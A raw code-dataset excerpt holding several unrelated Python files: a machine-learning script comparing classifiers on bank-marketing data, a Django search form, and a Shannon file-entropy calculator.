Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(lrmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Logistic Regression')\n\n\nreport.loc[len(report)] = ['Logistic Regression', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n# testing\nprint(report)\n\n\n\n\n##################\n# Neural Network #\n##################\n\nfrom sklearn.neural_network import MLPClassifier\n\n\nmodel_gs_param_grid = {\"hidden_layer_sizes\": [(10,10)], 'max_iter': [500]}\n#model_gs_param_grid = {\"hidden_layer_sizes\": [(10,10)], 'max_iter': [500]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=MLPClassifier(random_state=0, activation='relu'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\n\n# creating a Plot\ncreate_tabulate_plot(model_gs, \"hidden_layer_sizes\", \"max_iter\", \"hidden layer size of the NN\", \"maximum Iterations\", \"Neural Network\")\n\n\n# create model using the optimal parameters\nnnetmodel = model_gs.best_estimator_\nnnetmodel.fit(X_train, Y_train)\nY_train_pred = nnetmodel.predict(X_train)\nY_test_pred = nnetmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n# plot confusion matrix\nconfusion_matrix_plotter(nnetmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(nnetmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Neural Network')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['Neural Network', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_NN_report.csv', index = False)\n\n\n#############\n# SVC #\n#############\n\nfrom sklearn.svm import LinearSVC\n\nmodel_gs_param_grid = {\"C\": [13]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=LinearSVC(random_state=0, max_iter= 3000, class_weight=\"balanced\"), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\n\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\n\n\n# creating a Plot\ncreate_gridsearch_plot(model_gs, \"C\", \"C of SVC\", \"Linear SVC\")\n\n\n# create model using the optimal parameters\nsvcmodel = model_gs.best_estimator_\nsvcmodel.fit(X_train, Y_train)\nY_train_pred = svcmodel.predict(X_train)\nY_test_pred = svcmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, 
accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(svcmodel, X_test, Y_test)\n\n\n# plot classification report\nprint('Classification Report SVC: \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\nmetrics_dict[\"roc_auc\"] = \"Not available\"\n\n# # calculate ROC and AUC and plot the curve -> not available with LinearSVC\n# # we could use SVC(probability=True), but this is significantly slower and the results are not good enough to use in\n# # our final ensemble. So we will not plot roc_auc\n# roc_auc_results = calculate_roc_auc(svcmodel, X_test, Y_test)\n# metrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\n# metrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\n# metrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n# plot_model_metrics(metrics_dict, 'ROC Curve of SVC')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['SVC', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_SVC_report.csv', index = False)\n\n\n\n#########################################################\n#                    Tree classifiers                   #\n#-> preprocess data differently (no upsampling)         #\n#--> currently not in use due to ensembling approach    #\n#########################################################\n\n\n# use \"data_final\"\nsource = \"data_final\"\nupsample_input = 1\ndata = pd.read_csv(source+'.csv')\n\n\nprint('This Script is from', source)\nprint('it is upsampled times:', upsample_input)\n\n\ndata_numerical = pd.get_dummies(data, drop_first=True)\ndata_numerical = data_numerical.drop('y_yes', axis=1)\n\n# creating X and Y categories\nX_ori = data_numerical\nY = data['y']\n\n# Normalize the input variables\nX = (X_ori - X_ori.min()) / (X_ori.max() - X_ori.min())\n#print(X.head(6)) # testing\n\n\n# approach for custom upsampling - DEPRECATED due to new approach: select data_final without upsampling for all models\n# different approach due to ensembling with different datasets: select rows by indices of first train_test_split\n\nfrom sklearn.model_selection import train_test_split\n\n# raised to train size of 0.8\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n\n#print(\"Y_test is equals to Y_test_global: \", Y_test.equals(y_test_global))\n\n\n# select same rows as in initial train_test_split\n# X_train = X_ori[X_ori.index.isin(X_train_index)]\n# Y_train = Y[Y.index.isin(Y_train_index)]\n# X_test = X_ori[X_ori.index.isin(X_test_index)]\n# Y_test = Y[Y.index.isin(Y_test_index)]\n\n\n######################\n#   Decision Trees   #\n######################\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nmodel_gs_param_grid = {'max_depth': [5]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=DecisionTreeClassifier(criterion='entropy', random_state=0, class_weight='balanced'), param_grid=model_gs_param_grid,\n                                           scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\n\n# creating a 
Plot\ncreate_gridsearch_plot(model_gs, \"max_depth\", \"max depth of the tree\", \"Decision Tree\")\n\n\n# create model with optimal parameters\netmodel = model_gs.best_estimator_\netmodel.fit(X_train, Y_train)\nY_train_pred = etmodel.predict(X_train)\nY_test_pred = etmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(etmodel, X_test, Y_test)\n\n\n# plot classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(etmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Decision Tree')\n\n\n# plot feature importance\nplot_feature_importance(etmodel, 'Decision Tree - Feature Importance')\n\n# add metrics to the report\nreport.loc[len(report)] = ['Decision Tree', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_decision_tree_report.csv', index = False)\n\n\n# # if wanted: display the tree as an image using graphviz\n# #=============================================================================\n# #show tree using graphviz\n# import graphviz\n# dot_data = sk.tree.export_graphviz(etmodel, out_file=None,\n# feature_names=list(X),\n# filled=True, rounded=True,\n# special_characters=True)\n# graph = graphviz.Source(dot_data)\n# graph.format = 'png'\n# graph.render(\"Churn_entropy\")\n# #=============================================================================\n\n#################\n# Gini #\n#################\n\n\nmodel_gs_param_grid = {\"max_depth\": [4]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=DecisionTreeClassifier(random_state=0, class_weight='balanced'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_gini_report.csv', index = False)\n\n# creating a Plot\ncreate_gridsearch_plot(model_gs, \"max_depth\", \"max depth of the tree\", \"Gini Decision Tree\")\n\n\n# create model using the optimal parameters\ngtmodel = model_gs.best_estimator_\ngtmodel.fit(X_train, Y_train)\nY_train_pred = gtmodel.predict(X_train)\nY_test_pred = gtmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(gtmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = 
calculate_roc_auc(gtmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Gini Decision Tree')\n\n\n# plot feature importance\nplot_feature_importance(gtmodel, 'Gini Decision Tree - Feature Importance')\n\n# add metrics to the report\nreport.loc[len(report)] = ['Gini', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\n# # part of custom ensemble, DEPRECATED\n# ensemble_y_train_list.append(Y_train_pred)\n# ensemble_y_pred_list.append(Y_test_pred)\n\n\n# # if wanted: display the tree as an image using graphviz\n# #=============================================================================\n# #show tree using graphviz\n# import graphviz\n# dot_data = sk.tree.export_graphviz(gtmodel, out_file=None,\n#                                    feature_names=list(X),\n#                                    filled=True, rounded=True,\n#                                    special_characters=True)\n# graph = graphviz.Source(dot_data)\n# graph.format = 'png'\n# graph.render(\"Gini_Tree_Image\")\n# #=============================================================================\n\n\n#################\n# Random Forest #\n#################\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Build RandomForest model where the max_depth and the n_estimators are tested\n# new GridSearchCV implementation\n# attention: the parameter 'n_jobs=-1' means all CPU cores will be used. This may result in an overflow of the RAM\n# do not forget to change parameter 'cv'\nmodel_gs_param_grid = {'max_depth': [12], 'n_estimators': [400]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=RandomForestClassifier(random_state=0, class_weight='balanced'), param_grid=model_gs_param_grid,\n                                           scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint('Random-Forest-Results-Training: \\n', model_gs.cv_results_)\n\n\n# print GridSearchCV results\ncreate_tabulate_plot(model_gs, \"max_depth\", \"n_estimators\", \"max depth\", \"number of trees\", \"Random Forest\")\n\n# plot gridsearch\n#create_gridsearch_plot(model_gs, \"max_depth\", \"Maximum depth of the tree\", \"Random Forest\")\n\n\n# create model using the optimal parameters\nrfmodel = model_gs.best_estimator_\nrfmodel.fit(X_train, Y_train)\nY_train_pred = rfmodel.predict(X_train)\nY_test_pred = rfmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(rfmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(rfmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Random Forest')\n\n\n# show feature 
importance\nplot_feature_importance(rfmodel, 'Random Forest - Feature Importance')\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_random_forest_report.csv', index = False)\n\n# add metrics to report\nreport.loc[len(report)] = ['Random-Forest', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n# View a list of the features and their importance scores\nprint(list(zip(X_train, rfmodel.feature_importances_)))\n\n# # part of custom ensemble, DEPRECATED\n# ensemble_y_train_list.append(Y_train_pred)\n# ensemble_y_pred_list.append(Y_test_pred)\n\n\n\n#################################\n# NEEDS TO BE THE LAST MODEL!! # -> if approach with 3 different datasets is used for non-trees, trees and LightGBM\n#################################\n# LightGBM #\n#############\n\n\n# USES THE ORIGINAL DATASET WITHOUT DURATION\nsource = \"BankMarketing\"\n\ndata = pd.read_csv(source+'.csv')\n\ndata = data.drop(columns='duration')\ndata[data.select_dtypes('object').columns.tolist()] = data[data.select_dtypes('object').columns.tolist()].astype('category')\n\n\n# creating X and Y categories\nX = data.copy().drop(columns='y')\nY = data['y']\n\n# different approach due to ensembling with different datasets: select rows by indices of first train_test_split\nfrom sklearn.model_selection import train_test_split\n\n# raised to 0.8\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n\n# select same rows as initial train_test_split\n# X_train = X[X.index.isin(X_train_index)]\n# Y_train = Y[Y.index.isin(Y_train_index)]\n# X_test = X[X.index.isin(X_test_index)]\n# Y_test = Y[Y.index.isin(Y_test_index)]\n\n\n\nimport lightgbm as lgb\n\ncat_col = X_train.select_dtypes('object').columns.tolist() + X_train.select_dtypes('category').columns.tolist()\n\n\nd_train = lgb.Dataset(X_train, label=Y_train)\nd_valid = lgb.Dataset(X_test, label=Y_test)\n# for further exploration:\n#d_train = lgb.Dataset(X_train, label=Y_train, feature_name=X_train.columns.tolist(), categorical_feature=cat_col)\n\nprint(X_train.columns.tolist())\n\nmodel_gs_param_grid = {\"max_depth\": [5], \"learning_rate\": [0.005], \"num_leaves\": [31]}\n\n# parameter for lgb.LGBMClassifier(feature_name=X_train.columns.tolist())\nmodel_gs = sk.model_selection.GridSearchCV(estimator=lgb.LGBMClassifier(random_state=0, objective='binary', class_weight='balanced'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\n\n\n# create model using the optimal parameters\nlgbmodel = model_gs.best_estimator_\nlgbmodel.fit(X_train, Y_train)\nY_train_pred = lgbmodel.predict(X_train)\nY_test_pred = lgbmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(lgbmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(lgbmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = 
roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of LightGBM')\n\n\n# show feature importance\nplot_feature_importance(lgbmodel, 'LightGBM - Feature Importance')\n\nreport.loc[len(report)] = ['LightGBM Classifier', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_lightGBM_report.csv', index = False)\n\n\n# # part of custom ensemble, DEPRECATED\n# ensemble_y_train_list.append(Y_train_pred)\n# ensemble_y_pred_list.append(Y_test_pred)\n\n\n#\n# #############################\n# # Ensemble #\n# #############################\n#\n# from mlxtend.classifier import EnsembleVoteClassifier\n#\n# # use Gini Decision Tree, Random Forest, LightGBM\n# list_classifiers = [gtmodel, rfmodel, lgbmodel]\n#\n# # hard voting because soft voting did not improve results\n# ens_model = EnsembleVoteClassifier(clfs=list_classifiers)\n# accuracies = cross_val_score(ens_model,X_train,Y_train,scoring='accuracy',cv=10)\n#\n# ens_model.fit(X_train,Y_train)\n#\n# Y_train_pred = ens_model.predict(X_train)\n# Y_test_pred = ens_model.predict(X_test)\n#\n#\n# # calculate cmtr, acctr, cmte, accte\n# metrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n#\n# # Visualize Confusion Matrix\n# confusion_matrix_plotter(ens_model, X_test, Y_test)\n#\n# # print classification report\n# print('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n#\n#\n# # calculate precision & recall metrics\n# metrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n#\n#\n# # calculate f1 score\n# metrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n#\n#\n# # calculate ROC and AUC and plot the curve\n# roc_auc_results = calculate_roc_auc(ens_model, X_test, Y_test)\n# metrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\n# metrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\n# metrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n# plot_model_metrics(metrics_dict, 'ROC Curve of Ensemble')\n#\n# # add to the report\n# report.loc[len(report)] = ['Ensemble', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n#\n# print(report)\n#\n\n\n# NOT IN USE ANYMORE, approach to create a CUSTOM ENSEMBLE with different datasets for the different models\n# print(\"Y_test is equals to Y_test_global: \", Y_test.equals(y_test_global))\n#\n# (for optimized results per model)\n# ensemble results for: Gini Decision Tree, Random Forest, LightGBM\n# def get_ensemble_result(list_):\n# print(list_)\n# for j in list_:\n# print(j)\n# y_predictions = pd.DataFrame({0:list_[0], 1:list_[1], 2:list_[2]})\n# no_of_cols = len(y_predictions.columns)\n# threshold = no_of_cols/2\n# Y_ensemble_results = y_predictions.apply(lambda x: \"yes\" if ((x.value_counts().yes > 2) if hasattr(x.value_counts(), 'yes') else (x.value_counts().no<2)) else \"no\", axis=1)\n# print(Y_ensemble_results)\n# return Y_ensemble_results\n#\n# Y_train_pred_ensemble = get_ensemble_result(ensemble_y_train_list)\n# Y_test_pred_ensemble = get_ensemble_result(ensemble_y_pred_list)\n\n# calculate cmtr, acctr, cmte, accte\n# metrics_dict = calculate_metrics(y_train_global, y_test_global, Y_train_pred_ensemble, Y_test_pred_ensemble)\n#\n#\n#\n# # print classification 
report\n# print('Classification Report \\n', classification_report(y_test_global, Y_test_pred_ensemble))\n#\n#\n# # calculate precision & recall metrics\n# metrics_dict.update(calculate_precision_recall(y_test_global, Y_test_pred_ensemble))\n#\n#\n# # calculate f1 score\n# metrics_dict[\"f1te\"] = calculate_f1_score(y_test_global, Y_test_pred_ensemble)\n\n\n#############################\n# PRINT THE FINAL REPORT #\n#############################\n\n#report.to_csv('Testing/report_all_'+source+'.csv', index=False)\nreport.to_csv('Testing/report_all_final_data.csv', index=False)\n\nprint(\"stop\")\n\n\n\n\"\"\"\n\n#############################\n# Lime #\n#############################\n\nimport lime\nimport lime.lime_tabular\n\n# look for values that \nprint(Y_test.head(30))\n\npredict_fn = lambda x: rfmodel.predict_proba(x).astype(float)\nX = X_train.values\nexplainer = lime.lime_tabular.LimeTabularExplainer(X,feature_names= X_train.columns,class_names=['no', 'yes'],kernel_width=5)\n\nchosen_customer = X_test.loc[[7672]].values[0]\nexplanation = explainer.explain_instance(chosen_customer,predict_fn,num_features=10)\nfig1 = explanation.as_pyplot_figure();\n\nfig1.tight_layout()\nplot.savefig('lime_fig1.png', dpi=300)\n\n# for notebook output\nexplanation.show_in_notebook(show_all=False)\n\n\nchosen_customer_2 = X_test.loc[[28335]].values[0]\nexplanation = explainer.explain_instance(chosen_customer_2,predict_fn,num_features=10)\nfig2 = explanation.as_pyplot_figure();\n\nfig2.tight_layout()\nplot.savefig('lime_fig2.png', dpi=300)\n\n# for notebook output\nexplanation.show_in_notebook(show_all=False)\n\n\"\"\"\n\n\"\"\"\n#############################\n# Shap #\n#############################\nimport shap\n# for trees\nshap_explainer = shap.TreeExplainer(ens_model) #again replace model if needed\n# for non-trees -> NOTE: does not work for (voting) ensembles (not implemented in SHAP yet)\n#shap_explainer = shap.KernelExplainer(ens_model, X_train) #again replace model if needed\ntest_shap_vals = shap_explainer.shap_values(X_test)\n# test_shap_vals index 0 is impact on outcome=\"yes\", 1 is impact on outcome=\"no\"\nshap.summary_plot(test_shap_vals[0], X_test)\n\n\"\"\"\n","sub_path":"BankMarketing_ensemble_for_snippets.py","file_name":"BankMarketing_ensemble_for_snippets.py","file_ext":"py","file_size_in_byte":38603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"123813048","text":"from typing import List, Optional\n\nfrom crispy_forms.bootstrap import Accordion, AccordionGroup\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import HTML, Div, Field, Layout, Submit\nfrom django import forms\nfrom django.db.models import QuerySet\nfrom django.http import HttpRequest\nfrom django_select2.forms import Select2MultipleWidget\n\nfrom entities.models import Entity\nfrom modularhistory.constants.strings import EMPTY_STRING\nfrom modularhistory.forms import HistoricDateFormField\nfrom modularhistory.widgets.historic_date_widget import YearInput\nfrom search.models import CONTENT_TYPE_OPTIONS, ORDERING_OPTIONS\nfrom topics.models import Topic\n\nAccordion.template = 'forms/_accordion.html'\nAccordionGroup.template = 'forms/_accordion_group.html'\n\n\nclass SearchForm(forms.Form):\n \"\"\"Form for searching for searchable model instances.\"\"\"\n\n submit_button_text = 'Search'\n\n def __init__(\n self,\n request: HttpRequest,\n query: Optional[str] = None,\n suppress_unverified: bool = True,\n order_by_relevance: bool = False,\n 
excluded_content_types: List[int] = None,\n entities: Optional['QuerySet[Entity]'] = None,\n topics: Optional['QuerySet[Topic]'] = None,\n collapse_refinements: bool = False,\n *args,\n **kwargs,\n ):\n \"\"\"Construct the search form.\"\"\"\n super().__init__(*args, **kwargs)\n excluded_content_types = excluded_content_types or []\n self.request = request\n self.fields['query'] = forms.CharField(required=False, initial=query)\n ordering = 'relevance' if order_by_relevance else 'date'\n self.fields['ordering'] = forms.ChoiceField(\n choices=ORDERING_OPTIONS,\n widget=forms.RadioSelect,\n initial=ordering,\n required=False,\n )\n\n # TODO: refactor (to not increase queries/page load time)\n this_code_is_efficient = False\n if this_code_is_efficient:\n # Disable sorting by relevance if there are no criteria\n if not any([query, entities, topics]):\n self.fields['ordering'].widget.attrs['disabled'] = True\n\n # Filter unverified items\n quality = 'verified' if suppress_unverified else 'unverified'\n self.fields['quality'] = forms.ChoiceField(\n choices=(('verified', 'Verified'), ('unverified', 'Unverified')),\n widget=forms.RadioSelect,\n initial=quality,\n required=False,\n )\n if not self.request.user.is_superuser:\n self.fields['quality'].widget.attrs['disabled'] = True\n\n # TODO: optimize\n initial_content_types = [\n pk for pk, name in CONTENT_TYPE_OPTIONS if pk not in excluded_content_types\n ]\n self.fields['content_types'] = forms.MultipleChoiceField(\n choices=CONTENT_TYPE_OPTIONS,\n widget=forms.CheckboxSelectMultiple,\n initial=initial_content_types,\n required=False,\n )\n\n self.fields['start_year'] = HistoricDateFormField(\n required=False, widget=YearInput\n )\n self.fields['end_year'] = HistoricDateFormField(\n required=False, widget=YearInput\n )\n\n self.fields['entities'] = forms.ModelMultipleChoiceField(\n queryset=(entities or Entity.objects.all().only(*Entity.searchable_fields)),\n widget=Select2MultipleWidget,\n required=False,\n )\n self.fields['topics'] = forms.ModelMultipleChoiceField(\n queryset=(topics or Topic.objects.all().only(*Topic.searchable_fields)),\n widget=Select2MultipleWidget,\n required=False,\n )\n\n # https://django-crispy-forms.readthedocs.io/en/latest/form_helper.html\n self.helper = FormHelper()\n self.helper.form_id = 'refineSearchForm'\n self.helper.form_method = 'get'\n self.helper.form_action = 'search'\n self.helper.form_class = ''\n self.helper.field_class = ''\n self.helper.label_class = ''\n\n refinements = [\n Div('start_year', css_class=EMPTY_STRING),\n Div('end_year', css_class=EMPTY_STRING),\n Field('entities', css_class=EMPTY_STRING),\n Field('topics', css_class=EMPTY_STRING),\n Div('quality', css_class=EMPTY_STRING),\n Div('content_types', css_class=EMPTY_STRING),\n ]\n\n caret = (\n ''\n ''\n )\n\n layout = flexbox_holy_albatross(\n Field('query', css_class='form-control'),\n Field('ordering', css_class=EMPTY_STRING),\n )\n if collapse_refinements:\n layout += card(\n HTML(\n f'''\n \n
\n
\n '''\n ),\n *refinements,\n HTML('
'),\n )\n else:\n layout += flexbox_holy_albatross(*refinements)\n layout.append(Submit('submit', self.submit_button_text))\n self.helper.layout = Layout(*layout)\n\n\ndef card(*layout_items) -> List:\n \"\"\"Return crispy form layout items wrapped in a card.\"\"\"\n return [HTML('
'), *layout_items, HTML('
')]\n\n\ndef flexbox_holy_albatross(*layout_items) -> List:\n \"\"\"Return crispy form layout items wrapped in a flexbox holy albatross.\"\"\"\n return [HTML('
'), *layout_items, HTML('
')]\n","sub_path":"search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"457562776","text":"#Author: Alex Peplinski\n\"\"\"\nEFFECTS: calculates entropy of the setup.py file or any file\nthis code is adapted from FB36, a contributor on https://code.activestate.com/recipes/577476-shannon-entropy-calculation/#c3\n    file_entropy.py\n    Shannon Entropy of a file\n    = minimum average number of bits per character\n    required for encoding (compressing) the file\n    So the theoretical limit (in bytes) for data compression:\n    Shannon Entropy of the file * file size (in bytes) / 8\n    (Assuming the file is a string of byte-size (UTF-8?) characters\n    because if not then the Shannon Entropy value would be different.)\n    FB - 201011291\n\"\"\"\n#This code is adapted from author FB36 a contributor on https://code.activestate.com/recipes/577476-shannon-entropy-calculation/#c3\nimport sys\nimport math\nfrom os.path import abspath, dirname, join\n#from __future__ import division\n#from collections import Counter\n#import math\n\n\ndef entropy_calculator(entropy_file):\n    \"\"\"\n    Purpose: read the whole file into a byte array\n    \"\"\"\n    f = open(entropy_file, \"rb\")\n    byteArr = f.read()\n    f.close()\n    fileSize = len(list(byteArr))\n\n    # calculate the frequency of each byte value in the file\n    freqList = []\n    for b in range(256):\n        ctr = 0\n        for byte in byteArr:\n            if byte == b:\n                ctr += 1\n        freqList.append(float(ctr) / fileSize)\n    # Shannon entropy\n    ent = 0.0\n    for freq in freqList:\n        if freq > 0:\n            ent = ent + freq * math.log(freq, 2)\n    ent = -ent\n    return ent\n\n\ndef entropy_test():\n    \"\"\"\n    Purpose: Tests entropy calculation\n    \"\"\"\n    entropy_file = abspath(\n        join(dirname(__file__), './test_entropy.py'))\n    extracted_data = entropy_calculator(entropy_file)\n\n\nif __name__ == '__main__':\n    entropy_test()\n","sub_path":"Pyteria/Modules/file_entropy_calculator.py","file_name":"file_entropy_calculator.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"576201229","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport japanize_matplotlib\n\n# multiple correspondence 